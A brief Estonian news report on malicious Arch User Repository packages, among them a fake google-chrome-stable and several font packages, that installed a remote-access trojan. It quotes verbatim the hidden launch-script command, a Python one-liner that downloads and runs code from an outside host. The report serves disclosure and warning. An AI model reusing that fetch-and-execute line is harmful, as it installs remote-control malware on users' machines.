AUR-i (Arch User Repository), mida kasutatakse Arch Linuxis kolmandate osapoolte pakettide jagamiseks, jätkub pahatahtliku koodi avaldamine, mis on integreeritud mitteametlike brauserikogumite pakettidesse. Lisaks kahes nädalas tagasi tuvastatud pahatahtlikele pakettidele firefox-patch-bin, librewolf-fix-bin ja zen-browser-patched-bin, on AUR-i lisatud ka google-chrome-stable pakett, mis sisaldab muudatust, mis installib pahavara komponendi, mis annab süsteemile kaugjuurdepääsu.
Probleemse paketi PKGBUILD failis oli määratletud skripti paigaldamine brauseri google-chrome-stable.sh käivitamiseks, kus muuhulgas oli käsk ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘, mis laadis alla pahavara, mida VirusTotal tuvastas troojana Spark, mis võimaldab süsteemi kaugjuhtimist, protsesside käivitamist, failide edastamist, liikluse jälgimist ja ekraanipiltide saatmist.
Pahavara pakett google-chrome-stable laaditi üles eelmise nädala kolmapäeval ja eemaldati AUR administraatorite poolt paar tundi pärast selle ilmumist. Peaaegu samal ajal, kui google-chrome-stable AUR-is eemaldati, laaditi üles kaks pahavara paketti — «chrome» ja «chrome-bin», mis sisaldasid sarnast pahavara paigaldusscripti kasutaja süsteemi.
Seejärel tuvastati veel kolm paketti, millel on pahatahtlik kood: ttf-mac-fonts-all, ttf-ms-fonts-all ja gromit.
Allikas: opennet.ru
